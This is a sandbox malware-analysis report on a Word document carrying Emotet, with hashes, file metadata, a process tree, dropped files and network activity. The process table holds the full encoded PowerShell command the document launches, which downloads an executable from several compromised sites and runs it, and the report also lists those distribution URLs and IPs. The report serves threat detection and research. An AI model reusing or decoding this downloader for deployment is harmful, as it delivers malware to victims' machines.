File name: | 2019-11-07 Queja V284-38874 EV296.doc |
Full analysis: | https://app.any.run/tasks/49eeb7c2-c4d0-4d22-a323-01f3e47e09ae |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 08, 2019, 14:47:12 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Enim ut hic., Author: Vladislav Gaparovic, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 7 12:18:00 2019, Last Saved Time/Date: Thu Nov 7 12:18:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 169, Security: 0 |
MD5: | DF1B6A42BDCA5BE66728F8C7C479DA54 |
SHA1: | 31F0F194097A17F558A374ABA8B15DE586FA5A10 |
SHA256: | 3E4579B7DE17867F47F78840EF90AB6AD429AD2004EDE48D9097F997F1474F96 |
SSDEEP: | 6144:7CTJQGgyNVHNaqDSzGdD48+arOn76UwEt7XTB:7CTJQGgyNHaiWGe8+KOn+qt7N |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
HeadingPairs: |
|
---|---|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 197 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 169 |
Words: | 29 |
Pages: | 1 |
ModifyDate: | 2019:11:07 12:18:00 |
CreateDate: | 2019:11:07 12:18:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Vladislav Gašparovic |
Subject: | - |
Title: | Enim ut hic. |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
944 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2019-11-07 Queja V284-38874 EV296.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4008 | powershell -enco JABSAGgAdwBsAG4AdQBhAGQAbgBuAGkAPQAnAFcAZQB5AHQAegBkAGcAYQAnADsAJABOAHAAcABkAHkAaQBlAHUAcgBjAHIAZQBoACAAPQAgACcAMgA5ADkAJwA7ACQAWgB3AGEAYgBmAHUAdwBjAGEAPQAnAEIAZgB4AG8AYwBtAG0AYwBxACcAOwAkAE0AYQBqAHoAcgB6AGoAYgBqAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABOAHAAcABkAHkAaQBlAHUAcgBjAHIAZQBoACsAJwAuAGUAeABlACcAOwAkAEQAeABtAGUAeQBlAGUAdABuAGsAawA9ACcAUQB1AHoAeQBzAHEAZwB1AHcAbwAnADsAJABFAGQAdQBmAGkAdABkAG8AagBhAHQAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAEIAQwBsAEkAZQBuAFQAOwAkAFMAbAB6AG8AcwB1AHQAdgBuAGEAYwA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGcAcABmAGsAbwByAGUAYQAuAG8AcgBnAC8AdwBwAC0AYQBkAG0AaQBuAC8AcwA2AG4AZwBjADQALQB5AGoAcABnADgAawB1AC0ANQA4ADEAMQAvACoAaAB0AHQAcAA6AC8ALwAxAGMALgBwAGwALwBhAHcAbgBvAHIALwBCAG0AQQBaAGsASgBRAE4ALwAqAGgAdAB0AHAAcwA6AC8ALwBuAGUAeAB0AHMAbwBsAGUAdAByAGEAZABpAG4AZwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AegBTAGoAbgB3AGsALwAqAGgAdAB0AHAAcwA6AC8ALwB1AGYAYQBpAHIAZgBhAHgALgBlAGQAdQAvADAAbgAxADIALwBhADEAYwAwAHAAMgA1ADEAawAtAGcAbgBxAHoALQA1ADEAMAA2ADcANAAxADkAOAAvACoAaAB0AHQAcABzADoALwAvAHMAYQB2AGUAdABhAHgALgBpAGQAZgBjAG0AZgAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADIAegBrAGoAbwBtAHMANgAtAGUAbgBzADIANwBoAHcAZQAtADkAMQAvACcALgAiAHMAUABgAGwAaQB0ACIAKAAnACoAJwApADsAJABWAGsAYgB0AG4AZgBoAG8AbQBzAGMAbwA9ACcAUgB4AGgAcQB4AHIAbgBtAHgAaQBuAG4AagAnADsAZgBvAHIAZQBhAGMAaAAoACQAVABwAHcAYgBkAGkAYQB1ACAAaQBuACAAJABTAGwAegBvAHMAdQB0AHYAbgBhAGMAKQB7AHQAcgB5AHsAJABFAGQAdQBmAGkAdABkAG8AagBhAHQALgAiAGQAYABPAFcATgBsAE8AYABBAGQAZgBgAEkATABlACIAKAAkAFQAcAB3AGIAZABpAGEAdQAsACAAJABNAGEAagB6AHIAegBqAGIAagApADsAJABTAGcAaQBqAGsAZAB0AGQAegB6AD0AJwBEAHoAeQByAGsAeAB2AHoAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAJwArACcAdABlAG0AJwApACAAJABNAGEAagB6AHIAegBqAGIAagApAC4AIgBMAGUAbgBgAEcAdABIACIAIAAtAGcAZQAgADIANgAyADYAOAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAHQAYQBgAFIAVAAiACgAJABNAGEAagB6AHIAegBqAGIAagApADsAJABSAGwAZwBqAG4AcwBnAGEAdgA9ACcAVABtAHUAZgBxAHQAeQB1ACcAOwBiAHIAZQBhAGsAOwAkAFMAbwBqAG0AegBxAGQAcABuAGEAYwA9ACcAUgB5AGUAdABnAGsAdAB6ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAZwBtAHgAZgBoAGMAYgBuAGYAcAB5AD0AJwBYAG8AYwBjAGsAaABoAGIAbgBsAGMAZwBsACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2588 | "C:\Users\admin\299.exe" | C:\Users\admin\299.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Watson Subscriber for SENS Network Notifications Exit code: 0 Version: 12.0.6606.1000 | ||||
2496 | --809e8ef0 | C:\Users\admin\299.exe | — | 299.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Watson Subscriber for SENS Network Notifications Version: 12.0.6606.1000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA766.tmp.cvr | — | |
MD5:— | SHA256:— | |||
4008 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\85UMA4S03JFE0GBYHIL4.temp | — | |
MD5:— | SHA256:— | |||
4008 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Cab6BB0.tmp | — | |
MD5:— | SHA256:— | |||
4008 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Tar6BB1.tmp | — | |
MD5:— | SHA256:— | |||
4008 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Cab6BC1.tmp | — | |
MD5:— | SHA256:— | |||
4008 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Tar6BC2.tmp | — | |
MD5:— | SHA256:— | |||
4008 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Cab6DC7.tmp | — | |
MD5:— | SHA256:— | |||
4008 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Tar6DC8.tmp | — | |
MD5:— | SHA256:— | |||
944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E6922E5C.wmf | wmf | |
MD5:CFE5A2A3CE5C86B0B14855979281111E | SHA256:29EBF28B992A2A38802E7B80FF3D318989DC36FD6B015FAD76E3F3867B7D8502 | |||
944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6CB81368.wmf | wmf | |
MD5:E7CBC9AB1E522360D41217B2AD794873 | SHA256:D72B874F4B1A9485A9A189B4BEF6249F8D59E2D60A233AE22EF4E73DC00499AD |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4008 | powershell.exe | GET | 302 | 211.233.63.40:80 | http://www.gpfkorea.org/wp-admin/s6ngc4-yjpg8ku-5811/ | KR | — | — | suspicious |
4008 | powershell.exe | GET | 404 | 211.233.63.40:80 | http://www.gpfkorea.org/not_found | KR | html | 54.6 Kb | suspicious |
4008 | powershell.exe | GET | 200 | 205.185.216.10:80 | http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | US | compressed | 57.4 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4008 | powershell.exe | 165.227.204.101:443 | ufairfax.edu | Digital Ocean, Inc. | US | unknown |
4008 | powershell.exe | 207.154.196.11:443 | 1c.pl | Digital Ocean, Inc. | DE | unknown |
4008 | powershell.exe | 211.233.63.40:80 | www.gpfkorea.org | LG DACOM Corporation | KR | suspicious |
4008 | powershell.exe | 207.154.196.11:80 | 1c.pl | Digital Ocean, Inc. | DE | unknown |
4008 | powershell.exe | 164.68.123.209:443 | nextsoletrading.com | Cogent Communications | US | unknown |
4008 | powershell.exe | 35.171.206.208:443 | savetax.idfcmf.com | Amazon.com, Inc. | US | unknown |
4008 | powershell.exe | 205.185.216.10:80 | www.download.windowsupdate.com | Highwinds Network Group, Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
www.gpfkorea.org |
| suspicious |
1c.pl |
| unknown |
nextsoletrading.com |
| unknown |
ufairfax.edu |
| unknown |
savetax.idfcmf.com |
| suspicious |
www.download.windowsupdate.com |
| whitelisted |